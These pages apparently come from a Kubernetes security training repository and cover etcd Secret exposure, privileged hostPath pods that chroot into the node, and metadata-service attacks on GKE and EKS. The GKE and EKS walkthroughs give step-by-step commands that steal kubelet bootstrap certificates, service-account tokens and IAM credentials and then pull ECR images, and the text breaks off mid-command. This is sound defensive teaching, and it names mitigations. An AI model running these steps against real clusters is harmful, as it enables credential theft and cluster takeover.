kube-system             storage-provisioner                             1/1     Running   5          4d17h
mountme                 victim-7c5745b4dc-t4hdw                         1/1     Running   2          4d17h
mountme2                victim-7c5745b4dc-b2cmf                         1/1     Running   2          4d17h
sniff                   client-66b6f5cdcf-v5n9j                         1/1     Running   0          15h
sniff                   server-79b88f567-v4xsp                          1/1     Running   1          42h
sniff                   victim-7f4dc947d5-b9npv                         1/1     Running   0          15h
treasure-hunt           docker-registry-6b5b55b44-2mm42                 1/1     Running   2          4d17h
treasure-hunt           victim-68bcd4465f-n7s2r                         1/1     Running   2          4d17h
```

The setup is now complete. For details on each challenge, see the README in that challenge's directory in the repository.

---

[^1]: This is the rule most commonly used in Jeopardy-style CTFs. Other CTF formats exist, each with different rules.


================================================
FILE: source/kubernetes/security/etcd.md
================================================
# etcd

The Kubernetes control plane includes etcd, a key-value store that holds the cluster's state.
By default, etcd serves its API on 2379/tcp.

```shell
root@master1:/# ss -ntlp4 | grep etcd
LISTEN    0         4096             127.0.0.1:2379             0.0.0.0:*        users:(("etcd",pid=11583,fd=6))
LISTEN    0         4096            10.0.1.105:2379             0.0.0.0:*        users:(("etcd",pid=11583,fd=5))
LISTEN    0         4096            10.0.1.105:2380             0.0.0.0:*        users:(("etcd",pid=11583,fd=3))
```

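The stored data includes Secret resources, so appropriate access control and encryption are required.  
Many cluster provisioning tools configure etcd so that it is not exposed externally and connections require a TLS client certificate.

## Operating etcd

etcd can be operated through its API.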

```
root@master1:/# curl -s -k \
    --cert /etc/ssl/etcd/ssl/node-master1.pem \
    --key /etc/ssl/etcd/ssl/node-master1-key.pem \
    --cacert /etc/ssl/etcd/ssl/ca.pem \
    https://127.0.0.1:2379/version | jq
{
  "etcdserver": "3.4.13",
  "etcdcluster": "3.4.0"
}
```

You can also use etcdctl. Because the API differs between etcd versions, you may need to set the `ETCDCTL_API` environment variable to select the API version.  
Listing the keys shows that they include almost every resource in the Kubernetes cluster.

```
root@master1:/# etcdctl \
    --cert /etc/ssl/etcd/ssl/node-master1.pem \
    --key /etc/ssl/etcd/ssl/node-master1-key.pem \
    --cacert /etc/ssl/etcd/ssl/ca.pem \
    --endpoints https://127.0.0.1:2379 \
    get / --prefix --keys-only

/registry/apiextensions.k8s.io/customresourcedefinitions/bgpconfigurations.crd.projectcalico.org
/registry/apiextensions.k8s.io/customresourcedefinitions/bgppeers.crd.projectcalico.org
/registry/apiextensions.k8s.io/customresourcedefinitions/blockaffinities.crd.projectcalico.org
...
/registry/clusterrolebindings/calico-kube-controllers
/registry/clusterrolebindings/calico-node
/registry/clusterrolebindings/cephfs-csi-nodeplugin
...
/registry/clusterroles/admin
/registry/clusterroles/calico-kube-controllers
/registry/clusterroles/calico-node
...
/registry/configmaps/default/kube-root-ca.crt
/registry/configmaps/kube-node-lease/kube-root-ca.crt
/registry/configmaps/kube-public/cluster-info
...
/registry/controllerrevisions/kube-system/calico-node-f68f5dfc5
/registry/controllerrevisions/kube-system/kube-proxy-5bd89cc4b7
/registry/controllerrevisions/kube-system/nodelocaldns-84bfb6b45f
...
/registry/daemonsets/kube-system/calico-node
/registry/daemonsets/kube-system/kube-proxy
/registry/daemonsets/kube-system/nodelocaldns
...
/registry/deployments/kube-system/calico-kube-controllers
/registry/deployments/kube-system/coredns
/registry/deployments/kube-system/dns-autoscaler
...
/registry/namespaces/default
/registry/namespaces/kube-node-lease
/registry/namespaces/kube-public
...
/registry/pods/kube-system/calico-kube-controllers-7c5b64bf96-l54fz
/registry/pods/kube-system/calico-node-g7r9q
/registry/pods/kube-system/calico-node-pxzx4
...
/registry/secrets/kube-node-lease/default-token-jqg65
/registry/secrets/kube-public/default-token-rhw5q
/registry/secrets/kube-system/attachdetach-controller-token-dn6nl
...
```

The values are serialized binary data and are hard to read, but you can see that they contain the resource objects.

```shell
root@master1:/# etcdctl \
    --cert /etc/ssl/etcd/ssl/node-master1.pem \
    --key /etc/ssl/etcd/ssl/node-master1-key.pem \
    --cacert /etc/ssl/etcd/ssl/ca.pem \
    --endpoints https://127.0.0.1:2379 \
    get /registry/namespaces/kube-system -w fields
"ClusterID" : 18321220406064639639
"MemberID" : 7551142479662027965
"Revision" : 1223524
"RaftTerm" : 3
"Key" : "/registry/namespaces/kube-system"
"CreateRevision" : 4
"ModRevision" : 4
"Version" : 1
"Value" : "k8s\x00\n\x0f\n\x02v1\x12\tNamespace\x12\xb6\x01\n\x9b\x01\n\vkube-system\x12\x00\x1a\x00\"\x00*$a65a4862-cb15-4a8d-9115-35cb3dd9a6422\x008\x00B\b\b\xc9\xffو\x06\x10\x00z\x00\x8a\x01O\n\x0ekube-apiserver\x12\x06Update\x1a\x02v1\"\b\b\xc9\xffو\x06\x10\x002\bFieldsV1:\x1d\n\x1b{\"f:status\":{\"f:phase\":{}}}\x12\f\n\nkubernetes\x1a\b\n\x06Active\x1a\x00\"\x00"
"Lease" : 0
"More" : false
"Count" : 1
```

## Encrypting Secrets

By default, the data stored in etcd is not encrypted. If an attacker gains access to the etcd API, the credentials held in the Kubernetes cluster, including Secret resources, may therefore be leaked.

```shell
❯ kubectl create secret generic password --from-literal=pass='p@ssw0rd'
secret/password created

root@master1:/# etcdctl \
    --cert /etc/ssl/etcd/ssl/node-master1.pem \
    --key /etc/ssl/etcd/ssl/node-master1-key.pem \
    --cacert /etc/ssl/etcd/ssl/ca.pem \
    --endpoints https://127.0.0.1:2379 \
    get /registry/secrets/default/password -w fields
"ClusterID" : 18321220406064639639
"MemberID" : 7551142479662027965
"Revision" : 1228694
"RaftTerm" : 3
"Key" : "/registry/secrets/default/password"
"CreateRevision" : 1228577
"ModRevision" : 1228577
"Version" : 1
# The value contains `p@ssw0rd`
"Value" : "k8s\x00\n\f\n\x02v1\x12\x06Secret\x12\xcc\x01\n\xaf\x01\n\bpassword\x12\x00\x1a\adefault\"\x00*$85ed6ed7-af50-4962-9450-29de336c26132\x008\x00B\b\b\xf9\xde\xed\x88\x06\x10\x00z\x00\x8a\x01_\n\x0ekubectl-create\x12\x06Update\x1a\x02v1\"\b\b\xf9\xde\xed\x88\x06\x10\x002\bFieldsV1:-\n+{\"f:data\":{\".\":{},\"f:pass\":{}},\"f:type\":{}}\x12\x10\n\x04pass\x12\bp@ssw0rd\x1a\x06Opaque\x1a\x00\"\x00"
"Lease" : 0
"More" : false
"Count" : 1
```

When encryption is configured properly, the value looks like the following, and the plaintext can no longer be retrieved through the etcd API.

```yaml
"Value" : "k8s:enc:aesgcm:v1:key1:ZZS(՝Uu\x1e\x81\xc0owc\x83j\x8e\x05\x8b\a(\x85\xb2\x0e\x8dd%\xc9!\xeey7\x..."
```

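Several options are available for the encryption method. However, when a locally managed encryption key is used, the key is stored in the EncryptionConfiguration file, so the data may be decrypted if the host is compromised. For that reason, a method that uses envelope encryption, such as KMS, is recommended.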
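
When auditing etcd, it can help to tell encrypted values from plaintext ones mechanically. The following is a minimal sketch, assuming the stored value follows the `k8s:enc:<provider>:v1:<key name>:` layout seen in the sample above; the function name `parse_encryption_prefix` is hypothetical.

```python
from typing import Optional, Tuple


def parse_encryption_prefix(value: bytes) -> Optional[Tuple[str, str]]:
    """Return (provider, key_name) if the value carries a k8s:enc: prefix, else None."""
    if not value.startswith(b"k8s:enc:"):
        # Unencrypted objects in the samples above start with b"k8s\x00" instead.
        return None
    # Assumed layout: k8s:enc:<provider>:v1:<key name>:<ciphertext>
    parts = value.split(b":", 5)
    if len(parts) < 6:
        return None
    return parts[2].decode(), parts[4].decode()
```

A value for which this returns `None` should be treated as readable by anyone who can query etcd.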

# References

- https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/
- https://etcd.io/
- https://kubernetes.io/docs/tasks/administer-cluster/configure-upgrade-etcd/#securing-etcd-clusters


================================================
FILE: source/kubernetes/security/hostpath-mount.md
================================================
# Mounting Host Paths

A Pod can mount a path on the host as a volume. For example, creating the following Pod mounts the root directory of the node on which the Pod is scheduled under `/host`.

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: noderootpod
  labels:
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: noderootpod
    image: busybox
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "tail", "-f", "/dev/null" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /
```

```shell
$ kubectl exec -it noderootpod -- sh
/ # cd /host
/host # chroot .
root@lab-k8s-node-01:/#
root@lab-k8s-node-01:/# id
uid=0(root) gid=0(root) groups=0(root),10(uucp)
```

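If an attacker takes over an account that is allowed to create Pods, this technique can be used to escalate privileges. To prevent that, it is a good idea to explicitly define which directories may be mounted, for example with PodSecurityPolicy.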
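
The idea of an explicit allowlist can be sketched as a small check over a Pod manifest. This is an illustration only, not how PodSecurityPolicy is implemented; the function name `disallowed_host_paths` and the allowlist values are assumptions.

```python
import posixpath
from typing import Dict, List


def disallowed_host_paths(pod: Dict, allowed_prefixes: List[str]) -> List[str]:
    """Return every hostPath in the Pod spec that is outside the allowed prefixes."""
    violations = []
    for volume in pod.get("spec", {}).get("volumes") or []:
        host_path = volume.get("hostPath")
        if not host_path:
            continue
        # Normalize so that "/var/log/../.." cannot slip past a prefix check.
        path = posixpath.normpath(host_path.get("path", "/"))
        allowed = False
        for prefix in allowed_prefixes:
            prefix = posixpath.normpath(prefix)
            if path == prefix or path.startswith(prefix.rstrip("/") + "/"):
                allowed = True
                break
        if not allowed:
            violations.append(path)
    return violations
```

With an allowlist of `["/var/log"]`, the `noderoot` volume above (`path: /`) would be reported as a violation.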


================================================
FILE: source/kubernetes/security/metadata-service.md
================================================
# Accessing the Metadata Service

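Cloud providers such as GCP and AWS offer an endpoint called the Metadata Service that provides arbitrary data to instances. An instance can retrieve this data by accessing http://169.254.169.254/.  
Managed Kubernetes offerings such as GKE and EKS are no exception: without appropriate access control, Pods can reach the Metadata Service, which can lead to privilege escalation.  
This chapter presents example attacks that become possible when these endpoints are reachable on GKE and EKS, along with countermeasures.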

## GKE

The `kube-env` metadata entry in the GKE Metadata Service stores the credentials (a CA certificate and a public/private key pair) used by the bootstrap process that joins a node to the cluster.  
By using them to create a CertificateSigningRequest, an attacker can obtain a kubelet client certificate. With that certificate, requests can then be sent to the API server as the kubelet.

This is described in the GKE documentation on how the control plane and nodes authenticate.[^1]

> Each node in the cluster is injected with a shared Secret at creation, which it can use to submit certificate signing requests to the cluster root CA and obtain kubelet client certificates. These certificates are then used by the kubelet to authenticate its requests to the API server. Note that this shared Secret is reachable by Pods, unless metadata concealment is enabled.

Let's try it. Create a cluster on GKE, open a shell in a Pod, and first confirm that the metadata is accessible.

```shell
root@test:/# KUBE_ENV_URL="http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env"
root@test:/# curl -s -H "Metadata-flavor: Google" "${KUBE_ENV_URL}"
ALLOCATE_NODE_CIDRS: "true"
API_SERVER_TEST_LOG_LEVEL: --v=3
AUTOSCALER_ENV_VARS: kube_reserved=cpu=60m,memory=960Mi,ephemeral-storage=5Gi;node_labels=beta.kubernetes.io/fluentd-ds-ready=true,cloud.google.com/gke-nodepool=default-pool,cloud.google.com/gke-os-distribution=cos
CA_CERT: LS0tLS1CRUdJ...S0tLS0tCg==
CLUSTER_IP_RANGE: 10.0.0.0/14
CLUSTER_NAME: sandbox-cluster
CNI_SHA1: dcbeba8d6be7a49e399bda6b8b638d312eace876
CNI_STORAGE_PATH: https://storage.googleapis.com/gke-release/cni-plugins/v0.8.5-gke.1
CNI_STORAGE_URL_BASE: https://storage.googleapis.com/gke-release/cni-plugins
CNI_TAR_PREFIX: cni-plugins-linux-amd64-
CNI_VERSION: v0.8.5-gke.1
CREATE_BOOTSTRAP_KUBECONFIG: "true"
DNS_DOMAIN: cluster.local
DNS_SERVER_IP: 10.3.240.10
DOCKER_REGISTRY_MIRROR_URL: https://mirror.gcr.io
ELASTICSEARCH_LOGGING_REPLICAS: "1"
ENABLE_CLUSTER_DNS: "true"
ENABLE_CLUSTER_LOGGING: "false"
ENABLE_CLUSTER_MONITORING: none
ENABLE_CLUSTER_REGISTRY: "false"
ENABLE_CLUSTER_UI: "true"
ENABLE_L7_LOADBALANCING: glbc
ENABLE_METADATA_AGENT: ""
ENABLE_METRICS_SERVER: "true"
ENABLE_NODE_LOGGING: "false"
ENABLE_NODE_PROBLEM_DETECTOR: standalone
ENABLE_NODELOCAL_DNS: "false"
ENABLE_SYSCTL_TUNING: "true"
ENV_TIMESTAMP: "2020-09-10T02:20:16+00:00"
EXTRA_DOCKER_OPTS: --insecure-registry 10.0.0.0/8
FEATURE_GATES: DynamicKubeletConfig=false,TaintBasedEvictions=false,RotateKubeletServerCertificate=true,ExperimentalCriticalPodAnnotation=true
FLUENTD_CONTAINER_RUNTIME_SERVICE: containerd
HEAPSTER_USE_NEW_STACKDRIVER_RESOURCES: "true"
HEAPSTER_USE_OLD_STACKDRIVER_RESOURCES: "false"
HPA_USE_REST_CLIENTS: "true"
INSTANCE_PREFIX: gke-sandbox-cluster-e2749290
KUBE_ADDON_REGISTRY: k8s.gcr.io
KUBE_CLUSTER_DNS: 10.3.240.10
KUBE_DOCKER_REGISTRY: gke.gcr.io
KUBE_MANIFESTS_TAR_HASH: d669659b3716794bafc85a1808d5def16e536166
KUBE_MANIFESTS_TAR_URL: https://storage.googleapis.com/gke-release-asia/kubernetes/release/v1.15.12-gke.2/kubernetes-manifests.tar.gz,https://storage.googleapis.com/gke-release/kubernetes/release/v1.15.12-gke.2/kubernetes-manifests.tar.gz,https://storage.googleapis.com/gke-release-eu/kubernetes/release/v1.15.12-gke.2/kubernetes-manifests.tar.gz
KUBE_PROXY_TOKEN: SrS1RF7V6Te5rd95FYvBhTEN04hWTKp2X4nMoxBrFgY=
KUBELET_ARGS: --v=2 --cloud-provider=gce --experimental-check-node-capabilities-before-mount=true
  --experimental-mounter-path=/home/kubernetes/containerized_mounter/mounter --cert-dir=/var/lib/kubelet/pki/
  --cni-bin-dir=/home/kubernetes/bin --kubeconfig=/var/lib/kubelet/kubeconfig --image-pull-progress-deadline=5m
  --experimental-kernel-memcg-notification=true --max-pods=110 --non-masquerade-cidr=0.0.0.0/0
  --network-plugin=kubenet --node-labels=beta.kubernetes.io/fluentd-ds-ready=true,cloud.google.com/gke-nodepool=default-pool,cloud.google.com/gke-os-distribution=cos
  --volume-plugin-dir=/home/kubernetes/flexvolume --bootstrap-kubeconfig=/var/lib/kubelet/bootstrap-kubeconfig
  --node-status-max-images=25 --registry-qps=10 --registry-burst=20
KUBELET_CERT: LS0tLS1CR...tLS0tCg==
KUBELET_KEY: LS0tLS1CRUdJT...tFWS0tLS0tCg==
KUBERNETES_MASTER: "false"
KUBERNETES_MASTER_NAME: 35.200.103.159
LOGGING_DESTINATION: ""
LOGGING_STACKDRIVER_RESOURCE_TYPES: ""
MONITORING_FLAG_SET: "true"
NETWORK_PROVIDER: kubenet
NODE_LOCAL_SSDS_EXT: ""
NODE_PROBLEM_DETECTOR_TOKEN: etn...zY=
NON_MASQUERADE_CIDR: 0.0.0.0/0
REMOUNT_VOLUME_PLUGIN_DIR: "true"
REQUIRE_METADATA_KUBELET_CONFIG_FILE: "true"
SALT_TAR_HASH: ""
SALT_TAR_URL: https://storage.googleapis.com/gke-release-asia/kubernetes/release/v1.15.12-gke.2/kubernetes-salt.tar.gz,https://storage.googleapis.com/gke-release/kubernetes/release/v1.15.12-gke.2/kubernetes-salt.tar.gz,https://storage.googleapis.com/gke-release-eu/kubernetes/release/v1.15.12-gke.2/kubernetes-salt.tar.gz
SERVER_BINARY_TAR_HASH: a016a715584cc797c4d9c2c3c8ae34d0fb3837db
SERVER_BINARY_TAR_URL: https://storage.googleapis.com/gke-release-asia/kubernetes/release/v1.15.12-gke.2/kubernetes-server-linux-amd64.tar.gz,https://storage.googleapis.com/gke-release/kubernetes/release/v1.15.12-gke.2/kubernetes-server-linux-amd64.tar.gz,https://storage.googleapis.com/gke-release-eu/kubernetes/release/v1.15.12-gke.2/kubernetes-server-linux-amd64.tar.gz
SERVICE_CLUSTER_IP_RANGE: 10.3.240.0/20
STACKDRIVER_ENDPOINT: https://logging.googleapis.com
SYSCTL_OVERRIDES: ""
VOLUME_PLUGIN_DIR: /home/kubernetes/flexvolume
ZONE: asia-northeast1-b
```

The output contains a variety of data. Among these entries, `CA_CERT`, `KUBELET_CERT`, and `KUBELET_KEY` are the files needed to generate a certificate.  
They are base64-encoded, so decode and save them.

```shell
root@test:/# curl -s -H "Metadata-flavor: Google" "${KUBE_ENV_URL}" | grep -v "EVICTION" | grep -v "KUBELET_TEST_ARGS" | grep -v "EXTRA_DOCKER_OPTS" | sed -e 's/: /=/g' > env
root@test:/# source ./env

root@test:/# mkdir -p bootstrap
root@test:/# echo "$CA_CERT" | base64 -d > bootstrap/ca.crt
root@test:/# echo "$KUBELET_CERT" | base64 -d > bootstrap/kubelet-bootstrap.crt
root@test:/# echo "$KUBELET_KEY" | base64 -d > bootstrap/kubelet-bootstrap.key
```
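
The same extraction can be done without sourcing the whole `kube-env` document into a shell. The sketch below assumes the `KEY: value` line format shown in the output above; `extract_bootstrap_credentials` is a hypothetical helper name.

```python
import base64
from typing import Dict

# The three kube-env entries named in the text.
WANTED = ("CA_CERT", "KUBELET_CERT", "KUBELET_KEY")


def extract_bootstrap_credentials(kube_env: str) -> Dict[str, bytes]:
    """Pick the bootstrap credentials out of kube-env and base64-decode them."""
    creds = {}
    for line in kube_env.splitlines():
        key, sep, value = line.partition(": ")
        # Indented continuation lines (for example KUBELET_ARGS) never match a wanted key.
        if sep and key in WANTED:
            creds[key] = base64.b64decode(value.strip())
    return creds
```

Parsing only the three needed keys avoids evaluating attacker-irrelevant but shell-hostile values such as the multi-line `KUBELET_ARGS`.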

Also retrieve the hostname of the Node on which the Pod is running.

```shell
root@test:/# KUBE_HOSTNAME_URL="http://169.254.169.254/computeMetadata/v1/instance/hostname"
root@test:/# CURRENT_HOSTNAME="$(curl -s -H 'Metadata-flavor: Google' ${KUBE_HOSTNAME_URL} | awk -F. '{print $1}')"
root@test:/# echo $CURRENT_HOSTNAME
gke-sandbox-cluster-default-pool-f9270e72-mg63
```

To simplify the following steps, download `kubectl` as well.

```shell
root@test:/# curl -s -LO https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl
root@test:/# chmod +x kubectl
```

Next, create a CSR that contains the Node's hostname, to be submitted with the retrieved certificates.

```shell
root@test:/tmp# cat openssl.cnf
[ req ]
prompt = no
encrypt_key = no
default_md = sha256
distinguished_name = dname
[ dname ]
O = system:nodes
CN = system:node:gke-sandbox-cluster-default-pool-f9270e72-mg63

root@test:/tmp# openssl ecparam -genkey -name prime256v1 -out kubelet.key
root@test:/tmp# openssl req -new -config /tmp/openssl.cnf -key kubelet.key -out kubelet.csr
```

Create a CertificateSigningRequest resource. Set `request` to the base64-encoded value of the generated CSR.

```shell
root@test:/tmp# cat kubelet.csr | base64 | tr -d '\n'
LS0tLS1CRUdJ...LS0tLS0K

root@test:/# cat /tmp/kubelet.yaml
apiVersion: certificates.k8s.io/v1beta1
kind: CertificateSigningRequest
metadata:
  name: node-csr-gke-sandbox-cluster-default-pool-f9270e72-mg63-2
spec:
  groups:
  - system:authenticated
  request: LS0tLS1CRUdJ...LS0tLS0K
  usages:
  - digital signature
  - key encipherment
  - client auth
  username: kubelet
```
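
Building the manifest by hand is error-prone because the `request` field must be a single-line base64 string. As a sketch, the same document can be generated programmatically; the field values mirror the manifest above, and `build_csr_manifest` is a hypothetical helper name.

```python
import base64
import json


def build_csr_manifest(name: str, csr_pem: bytes) -> dict:
    """Wrap a PEM-encoded CSR in a CertificateSigningRequest object."""
    return {
        "apiVersion": "certificates.k8s.io/v1beta1",  # version used in the text
        "kind": "CertificateSigningRequest",
        "metadata": {"name": name},
        "spec": {
            "groups": ["system:authenticated"],
            # b64encode never inserts newlines, so no `tr -d '\n'` step is needed.
            "request": base64.b64encode(csr_pem).decode("ascii"),
            "usages": ["digital signature", "key encipherment", "client auth"],
            "username": "kubelet",
        },
    }


def to_json(manifest: dict) -> str:
    """Serialize the manifest; kubectl accepts JSON as well as YAML."""
    return json.dumps(manifest, indent=2)
```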

Once the CertificateSigningRequest is created, it is automatically approved by kube-controller-manager.[^2]

```shell
root@test:/# ./kubectl create -f /tmp/kubelet.yaml --certificate-authority=bootstrap/ca.crt --server=https://$KUBERNETES_MASTER_NAME --client-certificate=bootstrap/kubelet-bootstrap.crt --client-key=bootstrap/kubelet-bootstrap.key
certificatesigningrequest.certificates.k8s.io/node-csr-gke-sandbox-cluster-default-pool-f9270e72-mg63-2 created
```

Now that the request has been approved, retrieve the client certificate.

```shell
root@test:/# ./kubectl --certificate-authority=bootstrap/ca.crt --server=https://$KUBERNETES_MASTER_NAME --client-certificate=bootstrap/kubelet-bootstrap.crt --client-key=bootstrap/kubelet-bootstrap.key get csr
NAME                                                        AGE   REQUESTOR                                                    CONDITION
csr-tsfx7                                                   37m   system:node:gke-sandbox-cluster-default-pool-f9270e72-mg63   Approved,Issued
node-csr-P4UgPH1KuYujxgQkDUWU1cWtUcMlEBXl5kn0WqUxS3Y        37m   kubelet                                                      Approved,Issued
node-csr-gke-sandbox-cluster-default-pool-f9270e72-mg63-2   66s   kubelet                                                      Approved,Issued

root@test:/# ./kubectl --certificate-authority=bootstrap/ca.crt --server=https://$KUBERNETES_MASTER_NAME --client-certificate=bootstrap/kubelet-bootstrap.crt --client-key=bootstrap/kubelet-bootstrap.key get csr node-csr-gke-sandbox-cluster-default-pool-f9270e72-mg63-2 -o jsonpath='{.status.certificate}' | base64 -d > /tmp/kubelet.crt
```

With this certificate, it is possible to list Pods and view the Secrets used by those Pods. Listing Secrets is not allowed, but Get is, so any Secret that a Pod is using can be retrieved.

```shell
root@test:/# ./kubectl --certificate-authority=bootstrap/ca.crt --server=https://$KUBERNETES_MASTER_NAME --client-certificate=/tmp/kubelet.crt --client-key=/tmp/kubelet.key get pods
NAME   READY   STATUS    RESTARTS   AGE
test   1/1     Running   0          40m

root@test:/# ./kubectl --certificate-authority=bootstrap/ca.crt --server=https://$KUBERNETES_MASTER_NAME --client-certificate=/tmp/kubelet.crt --client-key=/tmp/kubelet.key get pods --all-namespaces -o=jsonpath='{range .items[*]}{.metadata.namespace}{"|"}{.metadata.name}{"|"}{.spec.volumes[*].secret.secretName}{"\n"}{end}'
default|test|default-token-xjxn2
kube-system|event-exporter-v0.3.0-5cd6ccb7f7-d6vnv|event-exporter-sa-token-t4jdk
kube-system|fluentd-gcp-scaler-6855f55bcc-kck48|fluentd-gcp-scaler-token-s767f
kube-system|fluentd-gcp-v3.1.1-zg5bc|fluentd-gcp-token-qlljh
kube-system|heapster-gke-858f6d47db-jmdm8|heapster-token-l47xx
kube-system|kube-dns-5c446b66bd-xbmn2|kube-dns-token-fx6l4
kube-system|kube-dns-autoscaler-6b7f784798-9q2mq|kube-dns-autoscaler-token-r5xl4
kube-system|kube-proxy-gke-sandbox-cluster-default-pool-f9270e72-mg63|
kube-system|l7-default-backend-84c9fcfbb-97tsn|default-token-psndk
kube-system|metrics-server-v0.3.3-fdc67d4b6-wglqz|metrics-server-token-d74js
kube-system|prometheus-to-sd-q7s2f|prometheus-to-sd-token-876dc
kube-system|stackdriver-metadata-agent-cluster-level-7df5d5fb48-v9l8w|metadata-agent-token-vnpdq

root@test:/# ./kubectl --certificate-authority=bootstrap/ca.crt --server=https://$KUBERNETES_MASTER_NAME --client-certificate=/tmp/kubelet.crt --client-key=/tmp/kubelet.key get secret -n kube-system prometheus-to-sd-token-876dc -o yaml
apiVersion: v1
data:
  ca.crt: LS0t...==
  namespace: a3ViZS1zeXN0ZW0=
  token: ZXlKXa...==
kind: Secret
metadata:
  annotations:
    kubernetes.io/service-account.name: prometheus-to-sd
    kubernetes.io/service-account.uid: c3ed5b36-685f-4f6e-93b9-4459a1a251d1
  creationTimestamp: "2020-09-10T02:23:40Z"
  name: prometheus-to-sd-token-876dc
  namespace: kube-system
  resourceVersion: "365"
  selfLink: /api/v1/namespaces/kube-system/secrets/prometheus-to-sd-token-876dc
  uid: 8651c53d-60d3-419c-877c-fef4e399e242
type: kubernetes.io/service-account-token
```
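
The values under `data` in a Secret are only base64-encoded, not encrypted. A minimal sketch of decoding them, assuming the Secret has already been loaded into a dictionary (`decode_secret_data` is a hypothetical helper name):

```python
import base64
from typing import Dict


def decode_secret_data(secret: Dict) -> Dict[str, bytes]:
    """Base64-decode every entry in a Secret's data map."""
    return {
        key: base64.b64decode(value)
        for key, value in (secret.get("data") or {}).items()
    }
```

For the Secret above, the `namespace` entry `a3ViZS1zeXN0ZW0=` decodes to `kube-system`, and the `token` entry decodes to the ServiceAccount's bearer token.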

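As shown, if a Pod is compromised and the Metadata Service is reachable, Secrets become accessible as well, which enables further privilege escalation.  
To prevent this kind of attack, GKE provides mechanisms such as Workload Identity[^3] and Shielded GKE Nodes[^4], and using them is recommended.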

## EKS

Next, let's look at the Metadata Service on EKS. On AWS, the Metadata Service is called the Amazon EC2 Instance Metadata Service (IMDS), so it is referred to as IMDS here as well.  
First, create a cluster with `eksctl`.

```shell
$ eksctl create cluster --nodes 1 --name test-cluster --node-type t3.large
...
$ kubectl get nodes
NAME                                                STATUS   ROLES    AGE     VERSION
ip-192-168-74-107.ap-northeast-1.compute.internal   Ready    <none>   2m51s   v1.17.12-eks-7684af
```

Once the cluster is ready, create a Pod and try accessing IMDS.

```shell
$ kubectl run --image=nicolaka/netshoot:latest --rm -it test bash
If you don't see a command prompt, try pressing enter.
bash-5.0# curl http://169.254.169.254/latest/meta-data/
ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
events/
hostname
iam/
identity-credentials/
instance-action
instance-id
instance-life-cycle
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
reservation-id
security-groups
```

The data differs from what GCP exposes. Because the stored values vary between cloud providers, it is worth checking which values your provider exposes and understanding the impact if they are accessed.

Among this data, one item that is useful to an attacker is the IAM role attached to the Node's instance. The cluster created here has an IAM role named `eksctl-test-cluster-nodegroup-ng-NodeInstanceRole-1T2SSTC513WI5` attached. Its credentials can also be retrieved.

```shell
bash-5.0# curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
eksctl-test-cluster-nodegroup-ng-NodeInstanceRole-1T2SSTC513WI5

bash-5.0# curl http://169.254.169.254/latest/meta-data/iam/security-credentials/eksctl-test-cluster-nodegroup-ng-NodeInstanceRole-1T2SSTC513WI5/
{
  "Code" : "Success",
  "LastUpdated" : "2020-11-23T13:32:29Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA...6GVD",
  "SecretAccessKey" : "MgZ0...Rv1A",
  "Token" : "IQoJb3JpZ...QKjFmg==",
  "Expiration" : "2020-11-23T20:06:44Z"
}
```
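
The fields of this JSON document map directly onto the environment variables that the `aws` CLI reads. A small sketch of that mapping, assuming the response shape shown above (`credentials_to_env` is a hypothetical helper name):

```python
import json
from typing import Dict


def credentials_to_env(document: str) -> Dict[str, str]:
    """Translate an IMDS security-credentials response into AWS environment variables."""
    creds = json.loads(document)
    if creds.get("Code") != "Success":
        raise ValueError("IMDS did not return usable credentials")
    return {
        "AWS_ACCESS_KEY_ID": creds["AccessKeyId"],
        "AWS_SECRET_ACCESS_KEY": creds["SecretAccessKey"],
        # Temporary credentials are only valid together with the session token.
        "AWS_SESSION_TOKEN": creds["Token"],
    }
```

Note the `Expiration` field: the credentials are temporary, so an attacker has to fetch them again once they expire.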

The following policies are attached to this IAM role.

- AmazonEKSWorkerNodePolicy
- AmazonEC2ContainerRegistryReadOnly
- AmazonEKS_CNI_Policy

These policies include permissions such as `ec2:DescribeInstances` and `ec2:DescribeVpcs`, so instance and network information can be retrieved.  
Even more interesting is `AmazonEC2ContainerRegistryReadOnly`, which allows pulling any Docker image from ECR. Being able to pull any Docker image means being able to obtain things such as application source code.

Let's try it. After installing the `aws` command in the Pod, repository information can be retrieved with the `aws ecr` command.

```shell
root@test:~# export AWS_ACCESS_KEY_ID=ASIA...6GVD
root@test:~# export AWS_SECRET_ACCESS_KEY=MgZ0...Rv1A
root@test:~# export AWS_SESSION_TOKEN=IQoJb3JpZ...QKjFmg==

root@test:~# aws ecr describe-repositories
{
    "repositories": [
        {
            "repositoryArn": "arn:aws:ecr:ap-northeast-1:926292163423:repository/mrtc0/test",
            "registryId": "926292163423",
            "repositoryName": "mrtc0/test",
            "repositoryUri": "926292163423.dkr.ecr.ap-northeast-1.amazonaws.com/mrtc0/test",
            "createdAt": "2020-11-23T22:51:31+09:00",
            "imageTagMutability": "MUTABLE",
            "imageScanningConfiguration": {
                "scanOnPush": false
            },
            "encryptionConfiguration": {
                "encryptionType": "AES256"
            }
        }
    ]
}

root@test:~# aws ecr list-images --repository-name mrtc0/test
{
    "imageIds": [
        {
            "imageDigest": "sha256:f9fc7e015619f2460609f17fe5903d698db775a340e4554c8a5b1c65d63b53b1",
            "imageTag": "latest"
        }
    ]
}
```

The login password for the registry can also be obtained.

```shell
root@test:~# aws ecr get-login-password --region ap-northeast-1
eyJwYXlsb2FkIjoiZlB4Qy9KdXFqajE5ZlRkektKZ1liaWlJW...

root@test:~# aws ecr get-login-password --region ap-northeast-1 | docker login --username AWS --password-stdin 926292163423.dkr.ecr.ap-northeast-1.amazonaws.com/mrtc0/test
WARNING! Your password will be stored unencrypted in /root/.docker/config.json.
Configure a credential helper to remove this warning. See
https://docs.docker.com/engine/reference/commandline/login/#credentials-store

Login Succeeded
```

Since login succeeds, let's fetch the image. Even without the `docker` command, image layers can be retrieved with `curl`.

```shell
root@test:~# export TOKEN=$(aws ecr get-login-password --region ap-northeast-1)
